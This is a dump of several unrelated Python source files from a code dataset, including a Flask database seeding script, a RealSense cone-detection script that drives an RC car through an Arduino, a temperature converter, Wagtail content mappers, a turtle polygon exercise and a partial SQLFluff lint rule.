BotfriendData\n","sub_path":"botfriend_api.py","file_name":"botfriend_api.py","file_ext":"py","file_size_in_byte":1219,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"616148428","text":"# -*- coding: utf-8 -*-\nfrom app import db, models\n\nmodels.User.query.delete()\nmodels.Question.query.delete()\nmodels.Answer.query.delete()\n\nu1 = models.User('Tom', 'user1@email.com', '0000')\nu2 = models.User('Siri', 'user2@email.com', '0000')\ndb.session.add(u1)\ndb.session.add(u2)\n\nq1 = models.Question('How many years are you programming?', u1)\nq2 = models.Question('Django or flask?', u2)\ndb.session.add(q1)\ndb.session.add(q2)\ndb.session.commit()","sub_path":"addrow.py","file_name":"addrow.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"437740495","text":"import pyrealsense2.pyrealsense2 as rs\nimport numpy as np\nimport cv2\nimport tensorflow as tf\nimport math\n\nimport os\nimport serial\nimport threading as t\nimport time\n\nfrom utils import cv_utils\nfrom utils import operations as ops\nfrom utils import tf_utils\n\nser = serial.Serial('/dev/ttyACM0', 19200, timeout=0.3)\nstrInput = \"show ver\"\nser.flush()\nser.write(strInput.encode('utf-8')+b'\\n')\n\n\nCAR_STATE = [\"CLOCK\",\"STRAIGHT\"]\n\n\nFRAME_WIDTH = 1280\nFRAME_HEIGHT = 720\n\nOFFSET = 450\n\n\nDETECT_MIN = (int(FRAME_WIDTH/2)-OFFSET, 0)\nDETECT_MAX = (int(FRAME_WIDTH/2)+OFFSET, FRAME_HEIGHT)\n\n\nLEFT_START_POINT = (int(FRAME_WIDTH/2)-OFFSET, 0) \nLEFT_END_POINT = (int(FRAME_WIDTH/2)-OFFSET, FRAME_HEIGHT)\n\nRIGHT_START_POINT = (int(FRAME_WIDTH/2)+OFFSET, 0) \nRIGHT_END_POINT = (int(FRAME_WIDTH/2)+OFFSET, FRAME_HEIGHT)\n\nLINE_COLOR = (0, 0, 255) \n\nLINE_THICKNESS = 5\n\nSCORE_THRESHOLD = 0.5\nNON_MAX_SUPPRESSION_THRESHOLD = 0.5\n\nOVERRIDE = True\n# Configure depth front\npipeline = rs.pipeline()\nconfig = rs.config()\nconfig.enable_device('035422073295')\nconfig.enable_stream(rs.stream.color, FRAME_WIDTH, FRAME_HEIGHT, rs.format.bgr8, 30)\nconfig.enable_stream(rs.stream.depth, FRAME_WIDTH, FRAME_HEIGHT, rs.format.z16, 30)\nconfig.enable_stream(rs.stream.infrared,1, FRAME_WIDTH, FRAME_HEIGHT, rs.format.y8, 30)\nconfig.enable_stream(rs.stream.infrared,2, FRAME_WIDTH, FRAME_HEIGHT, rs.format.y8, 30)\n\n\n# configure depth back\npipeline_back = rs.pipeline()\nconfig_back = rs.config()\nconfig_back.enable_device('034422074343')\nconfig_back.enable_stream(rs.stream.color, FRAME_WIDTH, FRAME_HEIGHT, rs.format.bgr8, 30)\nconfig_back.enable_stream(rs.stream.depth, FRAME_WIDTH, FRAME_HEIGHT, rs.format.z16, 30)\nconfig_back.enable_stream(rs.stream.infrared,1, FRAME_WIDTH, FRAME_HEIGHT, rs.format.y8, 30)\nconfig_back.enable_stream(rs.stream.infrared,2, FRAME_WIDTH, FRAME_HEIGHT, rs.format.y8, 30)\n\n\nprint(\"[INFO] Starting streaming...\")\nprofile = pipeline.start(config)\ndepth_sensor = profile.get_device().first_depth_sensor()\ndepth_scale = depth_sensor.get_depth_scale()\n\nprofile_back = pipeline_back.start(config_back)\ndepth_sensor_back = profile_back.get_device().first_depth_sensor()\ndepth_scale = depth_sensor_back.get_depth_scale()\n\nprint(\"[INFO] Camera ready.\")\n\n# download model from: https://github.com/opencv/opencv/wiki/TensorFlow-Object-Detection-API#run-network-in-opencv\nprint(\"[INFO] Loading model...\")\nCONE_CKPT = \"./frozen_inference_graph.pb\"\nRCNN_CKPT = \"./ssd_mobilenet_v2_coco_2018_03_29/frozen_inference_graph.pb\"\n\n# Load the Tensorflow model into memory.\ndetection_graph = tf.Graph()\nwith detection_graph.as_default():\n od_graph_def = tf.compat.v1.GraphDef()\n with tf.compat.v1.gfile.GFile(CONE_CKPT, 'rb') as fid:\n serialized_graph = fid.read()\n od_graph_def.ParseFromString(serialized_graph)\n tf.compat.v1.import_graph_def(od_graph_def, name='')\n sess = tf.compat.v1.Session(graph=detection_graph)\n\nrcnn_graph = tf.Graph()\nwith rcnn_graph.as_default():\n od_graph_def = tf.compat.v1.GraphDef()\n with tf.compat.v1.gfile.GFile(RCNN_CKPT, 'rb') as fid:\n serialized_graph = fid.read()\n od_graph_def.ParseFromString(serialized_graph)\n tf.compat.v1.import_graph_def(od_graph_def, name='')\n session_rcnn = tf.compat.v1.Session(graph=rcnn_graph)\n\n# coordinate distance\ndef distance(x1, x2, y1, y2):\n return math.sqrt( ((x1-x2)**2)+((y1-y2)**2) )\n\n# RC params\nSPEED = 0\nDIRECTION= 30\nMID_ANGLE = 30\nMAX_SPEED = 100\nMIN_SPEED = 5\n\ndetection_graph = tf_utils.load_model(CONE_CKPT)\nrcnn_graph = tf_utils.load_model(RCNN_CKPT)\n\n# camera\ncap = cv2.VideoCapture(0)\ncap.set(cv2.CAP_PROP_FRAME_WIDTH, FRAME_WIDTH)\ncap.set(cv2.CAP_PROP_FRAME_HEIGHT, FRAME_HEIGHT)\n\nhasStarted = False\n# input to arduino \ndef writeArduiono():\n while True:\n if hasStarted:\n if DIRECTION == 0 or DIRECTION == 90:\n ACTION = (str(DIRECTION)+\"#\" +str(SPEED)+ \"\\n\").encode('utf_8')\n ser.write(ACTION)\n line = ser.readline().decode('utf-8').rstrip()\t\n print(line)\n time.sleep(0.2)\n else:\n ACTION = (str(DIRECTION)+\"#\" +str(SPEED)+ \"\\n\").encode('utf_8')\n ser.write(ACTION)\n line = ser.readline().decode('utf-8').rstrip()\t\n print(line)\n print(\"Has started\")\n\n# start motor thread for individual process\nmotorThread = t.Thread(target = writeArduiono)\nmotorThread.start()\n\n# get the middle of 2 boudries\ndef mid_from_boundries_clock(left_cone, right_cone):\n if left_cone is None:\n left_cone = ((0,FRAME_HEIGHT/2), None)\n \n if right_cone is None:\n right_cone = ((FRAME_WIDTH, FRAME_HEIGHT/2), None)\n\n if left_cone is not None and left_cone[1] is not None and left_cone[1] ==\"ORANGE\":\n if right_cone[1] is None or (right_cone[1] is not None and right_cone[1] ==\"ORANGE\"):\n right_cone = ((0, FRAME_HEIGHT/2), None)\n else:\n left_cone = ((0,FRAME_HEIGHT/2), None)\n \n if right_cone[1] is not None and right_cone[1] ==\"GREEN\":\n if left_cone[1] is None or (left_cone[1] is not None and left_cone[1] ==\"GREEN\"):\n left_cone = ((FRAME_WIDTH, FRAME_HEIGHT/2), None)\n else:\n right_cone = ((FRAME_WIDTH,FRAME_HEIGHT/2), None)\n # middle of two objects\n _mid = (left_cone[0][0]+right_cone[0][0])/2\n return _mid\n\ndef mid_from_boundries_anti_clock(left_cone, right_cone):\n if left_cone is None:\n left_cone = ((FRAME_WIDTH, FRAME_HEIGHT/2), None) \n \n if right_cone is None:\n right_cone = ((0,FRAME_HEIGHT/2), None)\n\n if left_cone[1] is not None and left_cone[1] ==\"ORANGE\":\n if right_cone[1] is None or (right_cone[1] is not None and right_cone[1] ==\"ORANGE\"):\n right_cone = ((FRAME_WIDTH, FRAME_HEIGHT/2), None) \n else:\n left_cone = ((FRAME_WIDTH, FRAME_HEIGHT/2), None) \n \n if right_cone[1] is not None and right_cone[1] ==\"GREEN\":\n if left_cone[1] is None or (left_cone[1] is not None and left_cone[1] ==\"GREEN\"):\n left_cone = ((0,FRAME_HEIGHT/2), None)\n else:\n right_cone = ((0,FRAME_HEIGHT/2), None)\n # middle of two objects\n _mid = (left_cone[0][0]+right_cone[0][0])/2\n return _mid\n\n# Input tensor is the image\nimage_tensor = rcnn_graph.get_tensor_by_name('image_tensor:0')\n# Output tensors are the detection boxes, scores, and classes\n# Each box represents a part of the image where a particular object was detected\ndetection_boxes = rcnn_graph.get_tensor_by_name('detection_boxes:0')\n# Each score represents level of confidence for each of the objects.\n# The score is shown on the result image, together with the class label.\ndetection_scores = rcnn_graph.get_tensor_by_name('detection_scores:0')\ndetection_classes = rcnn_graph.get_tensor_by_name('detection_classes:0')\n# Number of objects detected\nnum_detections = rcnn_graph.get_tensor_by_name('num_detections:0')\n# code source of tensorflow model loading: https://www.geeksforgeeks.org/ml-training-image-classifier-using-tensorflow-object-detection-api/\nprint(\"[INFO] Model loaded.\")\ncolors_hash = {}\nclasses_90 = [\"background\", \"person\", \"bicycle\", \"car\", \"motorcycle\",\n \"airplane\", \"bus\", \"train\", \"truck\", \"boat\", \"traffic light\", \"fire hydrant\",\n \"unknown\", \"stop sign\", \"parking meter\", \"bench\", \"bird\", \"cat\", \"dog\", \"horse\",\n \"sheep\", \"cow\", \"elephant\", \"bear\", \"zebra\", \"giraffe\", \"unknown\", \"backpack\",\n \"umbrella\", \"unknown\", \"unknown\", \"handbag\", \"tie\", \"suitcase\", \"frisbee\", \"skis\",\n \"snowboard\", \"sports ball\", \"kite\", \"baseball bat\", \"baseball glove\", \"skateboard\",\n \"surfboard\", \"tennis racket\", \"bottle\", \"unknown\", \"wine glass\", \"cup\", \"fork\", \"knife\",\n \"spoon\", \"bowl\", \"banana\", \"apple\", \"sandwich\", \"orange\", \"broccoli\", \"carrot\", \"hot dog\",\n \"pizza\", \"donut\", \"cake\", \"chair\", \"couch\", \"potted plant\", \"bed\", \"unknown\", \"dining table\",\n \"unknown\", \"unknown\", \"toilet\", \"unknown\", \"tv\", \"laptop\", \"mouse\", \"remote\", \"keyboard\",\n \"cell phone\", \"microwave\", \"oven\", \"toaster\", \"sink\", \"refrigerator\", \"unknown\",\n \"book\", \"clock\", \"vase\", \"scissors\", \"teddy bear\", \"hair drier\", \"toothbrush\", \"cone\" ] \n\ndef convert_image(i):\n m = np.min(i)\n M = np.max(i)\n i = np.divide(i, np.array([M - m], dtype=np.float)).astype(np.float)\n i = (i - m).astype(np.float)\n i8 = (i * 255.0).astype(np.uint8)\n if i8.ndim == 3:\n i8 = cv2.cvtColor(i8, cv2.COLOR_BGRA2GRAY)\n i8 = cv2.equalizeHist(i8)\n colorized = cv2.applyColorMap(i8, cv2.COLORMAP_JET)\n colorized[i8 == int(m)] = 0\n font = cv2.FONT_HERSHEY_SIMPLEX\n m = float(\"{:.2f}\".format(m))\n M = float(\"{:.2f}\".format(M))\n return colorized\n\ncap = cv2.VideoCapture(6)\nwith tf.Session(graph=detection_graph) as sess,tf.Session(graph=rcnn_graph) as session_rcnn:\n while True:\n\n _, camera = cap.read()\n hasStarted = True\n if CAR_STATE[1] == \"STRAIGHT\":\n frames = pipeline.wait_for_frames()\n else:\n frames = pipeline_back.wait_for_frames()\n # color_frame = frames.get_color_frame()\n frame = frames.get_color_frame()\n depth_frame = frames.get_depth_frame()\n\n ir_frame_1 = frames.get_infrared_frame(1)\n ir_frame_2 = frames.get_infrared_frame(2)\n ir_frame_both = frames.get_infrared_frame()\n \n # Convert images to numpy arrays\n color_image = np.asanyarray(frame.get_data())\n\n # Convert images to numpy arrays\n\n ir_image_both = np.asanyarray(ir_frame_both.get_data())\n ir_image_both = convert_image(ir_image_both)\n\n\n ir_image_1 = np.asanyarray(ir_frame_1.get_data())\n ir_image_1 = cv2.applyColorMap(cv2.convertScaleAbs(ir_image_1, alpha=1), cv2.COLOR_BGRA2GRAY)\n\n ir_image_2 = np.asanyarray(ir_frame_2.get_data())\n ir_image_2 = cv2.applyColorMap(cv2.convertScaleAbs(ir_image_2, alpha=1), cv2.COLOR_BGRA2GRAY)\n\n\n depth_image = np.asanyarray(depth_frame.get_data())\n depth_colormap = cv2.applyColorMap(cv2.convertScaleAbs(depth_image, alpha=0.02), cv2.COLORMAP_JET)\n\n scaled_size = (frame.width, frame.height)\n # expand image dimensions to have shape: [1, None, None, 3]\n # i.e. a single-column array, where each item in the column has the pixel RGB value\n image_expanded = np.expand_dims(camera, axis=0)\n\n frame = np.asanyarray(frame.get_data())\n\n with session_rcnn.as_default():\n # Perform the actual detection by running the model with the image as input\n (boxes, scores, classes, num) = session_rcnn.run([detection_boxes, detection_scores, detection_classes, num_detections],\n feed_dict={image_tensor: image_expanded})\n \n boxes = np.squeeze(boxes)\n classes = np.squeeze(classes).astype(np.int32)\n scores = np.squeeze(scores)\n for idx in range(int(num)):\n class_ = classes[idx]\n score = scores[idx]\n box = boxes[idx]\n\n # print(class_,classes_90[class_])\n if class_ not in colors_hash:\n colors_hash[class_] = tuple(np.random.choice(range(256), size=3))\n\n if score > 0.7 and class_ == 1:\n left = int(box[1] * FRAME_WIDTH)\n top = int(box[0] * FRAME_HEIGHT)\n right = int(box[3] * FRAME_WIDTH)\n bottom = int(box[2] * FRAME_HEIGHT)\n\n r,g,b = cv_utils.predominant_rgb_color_object(\n depth_colormap, top, left, bottom, right)\n \n\n p1 = (left, top)\n p2 = (right, bottom)\n # r, g, b = colors_hash[class_]\n cv2.rectangle(frame, p1, p2, (int(r), int(g), int(b)), 2, 1)\n cv2.putText(frame, classes_90[class_], p1, cv2.FONT_HERSHEY_SIMPLEX, \n 1, (255,0,0), 2, cv2.LINE_AA) \n\n with detection_graph.as_default():\n crops, crops_coordinates = ops.extract_crops(\n frame, FRAME_HEIGHT, FRAME_WIDTH,\n FRAME_HEIGHT-20, FRAME_HEIGHT-20)\n \n detection_dict = tf_utils.run_inference_for_batch(crops, sess)\n\n # The detection boxes obtained are relative to each crop. Get\n # boxes relative to the original image\n # IMPORTANT! The boxes coordinates are in the following order:\n # (ymin, xmin, ymax, xmax)\n boxes = []\n for box_absolute, boxes_relative in zip(\n crops_coordinates, detection_dict['detection_boxes']):\n boxes.extend(ops.get_absolute_boxes(\n box_absolute,\n boxes_relative[np.any(boxes_relative, axis=1)]))\n if boxes:\n boxes = np.vstack(boxes)\n\n # Remove overlapping boxes\n boxes = ops.non_max_suppression_fast(\n boxes, NON_MAX_SUPPRESSION_THRESHOLD)\n\n # Get scores to display them on top of each detection\n boxes_scores = detection_dict['detection_scores']\n boxes_scores = boxes_scores[np.nonzero(boxes_scores)]\n detected = False\n hasLeft = False\n hasRight = False\n\n right_cone = None\n left_cone = None\n \n for box, score in zip(boxes, boxes_scores):\n if score > 0.1:\n left = int(box[1])\n top = int(box[0])\n right = int(box[3])\n bottom = int(box[2])\n\n # center of object\n avg_x = (left+right)/2\n avg_y = (top+bottom)/2\n\n # find the area of the object box\n width = distance(left, right, top, bottom)\n height = distance(left, right, top, bottom) \n area = int((width * height)/100)\n\n # motor control only if area of the object is in between two values\n if CAR_STATE[1] == \"STRAIGHT\":\n min_a = 300\n max_a = 1000\n else:\n min_a = 100\n max_a = 900\n\n if(area > min_a and area < max_a):\n p1 = (left, top)\n p2 = (right, bottom)\n\n r,g,b = cv_utils.predominant_rgb_color(\n frame, top, left, bottom, right)\n _color = None\n if(g > 200):\n _color =\"GREEN\"\n else:\n _color = \"ORANGE\"\n\n if((avg_x > LEFT_START_POINT[0] and avg_x < RIGHT_START_POINT[0]) \n or (avg_y > LEFT_START_POINT[1] and avg_y < RIGHT_START_POINT[1]) ):\n detected = True\n\n if(avg_x < (FRAME_WIDTH/2)):\n cone = \"LEFT\"\n else:\n cone = \"RIGHT\"\n\n if(cone == \"LEFT\" and _color == \"GREEN\"):\n if(hasLeft):\n pass\n else:\n hasLeft = True\n left_cone = (((right+right)/2, (top+bottom)/2),_color)\n\n cv2.rectangle(frame, p1, p2, (int(r), int(g), int(b)), 2, 1)\n cv2.putText(frame, f\"{r}, {g}, {b}\", p1, cv2.FONT_HERSHEY_SIMPLEX, \n 1, (b,g,r), 2, cv2.LINE_AA) \n\n if(cone == \"RIGHT\" and _color == \"ORANGE\"):\n if(hasRight):\n pass\n else:\n hasRight = True\n right_cone = (((right+right)/2, (top+bottom)/2), _color)\n\n cv2.rectangle(frame, p1, p2, (int(r), int(g), int(b)), 2, 1)\n cv2.putText(frame, f\"{r}, {g}, {b}\", p1, cv2.FONT_HERSHEY_SIMPLEX, \n 1, (b,g,r), 2, cv2.LINE_AA) \n \n if(cone==\"LEFT\" and hasLeft == False and _color == \"ORANGE\"):\n hasLeft = True\n left_cone = (((right+right)/2, (top+bottom)/2),_color)\n\n cv2.rectangle(frame, p1, p2, (int(r), int(g), int(b)), 2, 1)\n cv2.putText(frame, f\"{r}, {g}, {b}\", p1, cv2.FONT_HERSHEY_SIMPLEX, \n 1, (b,g,r), 2, cv2.LINE_AA) \n\n if(cone==\"RIGHT\" and hasRight == False and _color == \"GREEN\"):\n hasRight = True\n right_cone = (((left+left)/2, (top+bottom)/2),_color)\n\n cv2.rectangle(frame, p1, p2, (int(r), int(g), int(b)), 2, 1)\n cv2.putText(frame, f\"{r}, {g}, {b}\", p1, cv2.FONT_HERSHEY_SIMPLEX, \n 1, (b,g,r), 2, cv2.LINE_AA) \n\n CENTER_X = (int(FRAME_WIDTH/2))\n if CAR_STATE[0] == \"CLOCK\":\n # middle of two objects\n _mid = mid_from_boundries_clock(left_cone, right_cone)\n elif CAR_STATE[0] == \"ANTI-CLOCK\":\n _mid = mid_from_boundries_anti_clock(left_cone, right_cone)\n\n if(OVERRIDE == False):\n ## alpha stage of motor and speed control\n # if((_mid < CENTER_X and _mid > LEFT_START_POINT[0])): \n # DIRECTION = np.interp(_mid,[320,510],[30,60])\n # # DIRECTION = 60\n # elif((_mid > CENTER_X and _mid < RIGHT_START_POINT[0]) or left_cone[1] == \"ORANGE\"):\n # DIRECTION = np.interp(_mid,[125,320],[0,30])\n # else:\n # DIRECTION = 30\n # SPEED = 10\n\n # dynamic direction and speed of motor\n DIRECTION = int(np.interp(_mid,[LEFT_START_POINT[0],RIGHT_START_POINT[0]],[60,0]))\n # middle angle is 30\n diff_angle = abs(DIRECTION-MID_ANGLE)\n\n if (CAR_STATE[1] == \"STRAIGHT\"):\n SPEED = int(np.interp(diff_angle, [0, MID_ANGLE],[MAX_SPEED, MIN_SPEED]))\n elif(CAR_STATE[1] ==\"REVERSE\"):\n SPEED = -int(np.interp(diff_angle, [0, MID_ANGLE],[MAX_SPEED, MIN_SPEED]))\n else:\n SPEED = 0\n DIRECTION = 30\n\n if(detected):\n LINE_COLOR = (0,0,255)\n else:\n LINE_COLOR = (0,255,0)\n # print(LINE_COLOR)\n cv2.circle(frame, (int(FRAME_WIDTH/2), int(FRAME_HEIGHT/2)), 20, (255,255,0), 2)\n cv2.line(frame, LEFT_START_POINT, LEFT_END_POINT, LINE_COLOR, LINE_THICKNESS) \n cv2.line(frame, RIGHT_START_POINT, RIGHT_END_POINT, LINE_COLOR, LINE_THICKNESS) \n \n # debugging text\n cv2.putText(frame,f\"Overide State: {OVERRIDE}\", (int(FRAME_WIDTH/1.3)-20,int(FRAME_HEIGHT/2)-50), cv2.FONT_HERSHEY_SIMPLEX, 1, (255,0,0), 2, cv2.LINE_AA)\n cv2.putText(frame,f\"Detected: {detected}\", (int(FRAME_WIDTH/1.3)-20, int(FRAME_HEIGHT/2)-20), cv2.FONT_HERSHEY_SIMPLEX, 1, (255,0,0), 2, cv2.LINE_AA)\n \n cv2.putText(frame,f\"Left Cone: {left_cone}\", (10,int(FRAME_HEIGHT/2)-50), cv2.FONT_HERSHEY_SIMPLEX, 1, (255,0,0), 2, cv2.LINE_AA)\n cv2.putText(frame,f\"Right Cone: {right_cone}\", (10,int(FRAME_HEIGHT/2)-20), cv2.FONT_HERSHEY_SIMPLEX, 1, (255,0,0), 2, cv2.LINE_AA)\n\n cv2.putText(frame,f\"Face: {CAR_STATE[0]}\", (10,int(FRAME_HEIGHT)-50), cv2.FONT_HERSHEY_SIMPLEX, 1, (255,0,0), 2, cv2.LINE_AA)\n cv2.putText(frame,f\"DRIVE: {CAR_STATE[1]}\", (10,int(FRAME_HEIGHT)-20), cv2.FONT_HERSHEY_SIMPLEX, 1, (255,0,0), 2, cv2.LINE_AA)\n\n\n cv2.putText(frame,f\"SPEED: {SPEED}\", (FRAME_WIDTH-250, FRAME_HEIGHT-50), cv2.FONT_HERSHEY_SIMPLEX, 1, (255,0,0), 2, cv2.LINE_AA)\n cv2.putText(frame,f\"DIRECTION: {DIRECTION}\", (FRAME_WIDTH-250,FRAME_HEIGHT-20), cv2.FONT_HERSHEY_SIMPLEX, 1, (255,0,0), 2, cv2.LINE_AA)\n try:\n cv2.putText(frame,f\"MID: {_mid}\", (FRAME_WIDTH-250,FRAME_HEIGHT-100), cv2.FONT_HERSHEY_SIMPLEX, 1, (255,0,0), 2, cv2.LINE_AA) \n cv2.line(frame, (int(_mid), 0), (int(_mid), FRAME_HEIGHT), (100,200,200), LINE_THICKNESS) \n except:\n continue\n \n\n t = cv2.waitKey(1)\n\n frame_final = frame.copy()\n\n # overlay shit here\n overlay_aspect = [int(FRAME_HEIGHT*0.2), int(FRAME_WIDTH*0.2)]\n w_overlay_start = 100\n frame_final[10:10+overlay_aspect[0],w_overlay_start:w_overlay_start+overlay_aspect[1],:] = cv2.resize(depth_colormap, (overlay_aspect[1], overlay_aspect[0]))\n w_overlay_start += overlay_aspect[1] + 20\n frame_final[10:10+overlay_aspect[0],w_overlay_start:w_overlay_start+overlay_aspect[1],:] = cv2.resize(ir_image_1, (overlay_aspect[1], overlay_aspect[0]))\n w_overlay_start += overlay_aspect[1] + 20\n frame_final[10:10+overlay_aspect[0],w_overlay_start:w_overlay_start+overlay_aspect[1],:] = cv2.resize(ir_image_2, (overlay_aspect[1], overlay_aspect[0]))\n w_overlay_start += overlay_aspect[1] + 20\n frame_final[10:10+overlay_aspect[0],w_overlay_start:w_overlay_start+overlay_aspect[1],:] = cv2.resize(ir_image_both, (overlay_aspect[1], overlay_aspect[0]))\n\n cv2.namedWindow('RealSense', cv2.WINDOW_AUTOSIZE)\n cv2.imshow('RealSense', frame_final)\n cv2.imshow(\"IR\",cv2.applyColorMap(cv2.convertScaleAbs(depth_colormap, alpha=0.02), cv2.COLORMAP_JET))\n # cv2.imshow('Depth', depth_colormap)\n\n if t == ord('q'):\n break\n \n if t == ord('i'):\n CAR_STATE[1]=\"STRAIGHT\"\n elif t == ord('k'):\n CAR_STATE[1] = \"REVERSE\"\n\n if t == ord('j'):\n CAR_STATE[0]=\"CLOCK\"\n elif t == ord('l'):\n CAR_STATE[0] = \"ANTI-CLOCK\"\n\n if t == ord('s'):\n if OVERRIDE == False:\n OVERRIDE = True\n SPEED = 0\n print(\"Overide ON\")\n else:\n SPEED = int(np.interp(30, [0, MID_ANGLE],[MAX_SPEED,MIN_SPEED]))\n OVERRIDE = False\n print(\"Overdie OFF\")\n\n\nhasStarted = False\n\nprint(\"[INFO] stop streaming ...\")\ncap.release()\ncv2.destroyAllWindows()\nprint(\"[INFO] closing thread ...\")\nraise SystemExit\n","sub_path":"CONE_DUMP/camera/camera_test.py","file_name":"camera_test.py","file_ext":"py","file_size_in_byte":23016,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"193035386","text":"#Write a Python program to convert temperatures to and from celsius,Fahrenheit\r\n\r\n\r\ndef CELCIUS_FARENHEIT ():\r\n valorCelsius = int ( input ( \"Por favor ingrese el valor en celsius: \" ))\r\n\r\n valorFahrenheit = ( valorCelsius * 1.8 ) + 32\r\n\r\n print( f'El valor en Fahrenheit es: { valorFahrenheit } ' )\r\n\r\nresultado = CELCIUS_FARENHEIT()\r\n\r\n\r\n\r\n","sub_path":"Ejercicio_25/Celsius_Fahrenheit.py","file_name":"Celsius_Fahrenheit.py","file_ext":"py","file_size_in_byte":356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"507223605","text":"from wagtail_content_import.mappers.streamfield import StreamFieldMapper\nfrom wagtail_content_import.mappers.converters import RichTextConverter, ImageConverter, TableConverter, TextConverter, BaseConverter\n\n\nclass SimpleMapper(StreamFieldMapper):\n html = RichTextConverter('paragraph')\n image = ImageConverter('image')\n heading = TextConverter('heading')\n table = TableConverter('table')\n\n\nclass HeadingBlockConverter(BaseConverter):\n def __call__(self, element, **kwargs):\n return (self.block_name, {'heading_text': element['value'], 'size': 'h2'})\n\nclass ImageBlockConverter(BaseConverter):\n def __call__(self, element, **kwargs):\n file_name, content = ImageConverter.fetch_image(element['value'])\n image = ImageConverter.import_as_image_model(file_name, content, kwargs['user'])\n return (self.block_name, {'image': image})\n\nclass BaseBlockMapper(StreamFieldMapper):\n html = RichTextConverter('paragraph_block')\n image = ImageBlockConverter('image_block')\n heading = HeadingBlockConverter('heading_block')\n table = TableConverter('table_block')\n","sub_path":"bakerydemo/base/mappers.py","file_name":"mappers.py","file_ext":"py","file_size_in_byte":1106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"192717314","text":"'''\nAuthor: Cody Deeran\nDate: Feburary 7. 2017\nClass: ISTA 130\nSection Leader: Hanna Smith\n\nDescription:\nThis program draw multiple shapes using turtle graphics\n'''\n\nimport turtle\n\ndef polygon(turtle, sides, length):\n '''\n This function will draw a polygon. What kind will\n be determined by the number of sides.\n\n Parameters:\n turtle - A turtle object that will be used to draw\n the polygon.\n sides - The number of sides the polygon will have.\n length - The length of each side.\n\n Returns: None\n '''\n angle = 360 / sides\n for i in range(sides):\n turtle.forward(length)\n turtle.left(angle)\n\n return None\n\n#==========================================================\ndef main():\n '''\n This will define different turtle objects that will be\n used to draw polygons. Each turtle object will call the\n function polygon to draw thier repective shape.\n '''\n # Have the people change these numbers.\n size = 50\n separate = 20\n numOfShapes = 5\n pentSides = 5\n triSides = 7\n sqrSides = 9\n color = 'blue'\n color1 = 'green'\n color2 = 'purple'\n\n # Define the turtle to draw the pentagons\n pent = turtle.Turtle()\n pent.speed(0)\n pent.penup()\n pent.pensize(5)\n pent.forward(size)\n pent.seth(180)\n\n # Draw the pentagons\n for i in range(numOfShapes):\n pent.pencolor(color)\n pent.pendown()\n polygon(pent, pentSides, size)\n pent.penup()\n pent.seth(270)\n pent.forward(separate)\n pent.seth(180)\n\n # Define the turtle to draw the triangles\n tri = turtle.Turtle()\n tri.speed(0)\n tri.penup()\n tri.pensize(5)\n tri.seth(60)\n\n # Draw the triangles\n for i in range(numOfShapes):\n tri.pencolor(color1)\n tri.pendown()\n polygon(tri, triSides, size)\n tri.penup()\n tri.seth(150)\n tri.forward(separate)\n tri.seth(60)\n\n # Define the turtle to draw the squares\n sqr = turtle.Turtle()\n sqr.speed(0)\n sqr.penup()\n sqr.pensize(5)\n sqr.forward(size)\n sqr.seth(30)\n\n # Draw the squares\n for i in range(numOfShapes):\n sqr.pencolor(color2)\n sqr.pendown()\n polygon(sqr, sqrSides, size)\n sqr.penup()\n sqr.forward(separate)\n\n input('Press enter to end.') # keeps the turtle graphics window open\n\nif __name__ == '__main__':\n main()\n","sub_path":"hw/2/polygons.py","file_name":"polygons.py","file_ext":"py","file_size_in_byte":2423,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"64206955","text":"from game_config.game import GameConfig\nfrom game_state.influence_tracks import InfluenceTracksStates\nfrom game_state.map import MapState\nfrom game_state.player import PlayerState\n\n\nclass GameState(object):\n def __init__(self, game_config: GameConfig):\n self.map_state = MapState(game_config.game_map)\n self.influence_state = InfluenceTracksStates(game_config.influence_tracks)\n self.player_states = []\n for player_config in game_config.players:\n player_state = PlayerState(game_config, player_config, self.map_state)\n self.player_states.append(player_state)\n\n self.round_number = 1\n\n def get_player(self, name: str) -> PlayerState:\n for player in self.player_states:\n if player.player_config.name == name:\n return player\n raise KeyError(f\"No player state with name {name}\")\n","sub_path":"game_state/game_state.py","file_name":"game_state.py","file_ext":"py","file_size_in_byte":878,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"394310382","text":"\"\"\"Implementation of Rule L035.\"\"\"\n\nfrom sqlfluff.core.rules.base import BaseRule, LintFix, LintResult\nfrom sqlfluff.core.rules.doc_decorators import document_fix_compatible\n\n\n@document_fix_compatible\nclass Rule_L035(BaseRule):\n \"\"\"Do not specify \"else null\" in a case when statement (redundant).\n\n | **Anti-pattern**\n\n .. code-block:: sql\n\n select\n case\n when name like '%cat%' then 'meow'\n when name like '%dog%' then 'woof'\n else null\n end\n from x\n\n | **Best practice**\n | Omit \"else null\"\n\n .. code-block:: sql\n\n select\n case\n when name like '%cat%' then 'meow'\n when name like '%dog%' then 'woof'\n end\n from x\n \"\"\"\n\n def _eval(self, segment, **kwargs):\n \"\"\"Find rule violations and provide fixes.\n\n 0. Look for a case expression\n 1. Look for \"ELSE\"\n 2. Mark \"ELSE\" for deletion (populate \"fixes\")\n 3. Backtrack and mark all newlines/whitespaces for deletion\n 4. Look for a raw \"NULL\" segment\n 5.a. The raw \"NULL\" segment is found, we mark it for deletion and return\n 5.b. We reach the end of case when without matching \"NULL\": the rule passes\n \"\"\"\n if segment.is_type(\"case_expression\"):\n fixes = []\n for idx, seg in enumerate(segment.segments):\n # When we find ELSE we delete\n # everything up to NULL\n if fixes:\n fixes.append(LintFix(\"delete\", seg))\n # Safe to look for NULL, as an expression\n # would contain NULL but not be == NULL\n if seg.raw_upper == \"NULL\":\n return LintResult(anchor=segment, fixes=fixes)\n\n if not fixes and seg.name == \"else\":\n fixes.append(LintFix(\"delete\", seg))\n # Walk back to remove indents/whitespaces\n walk_idx = idx - 1\n while (\n segment.segments[walk_idx].name == \"whitespace\"\n or segment.segments[walk_idx].name == \"newline\"\n or segment.segments[walk_idx].is_meta\n ):\n fixes.append(LintFix(\"delete\", segment.segments[walk_idx]))\n walk_idx = walk_idx - 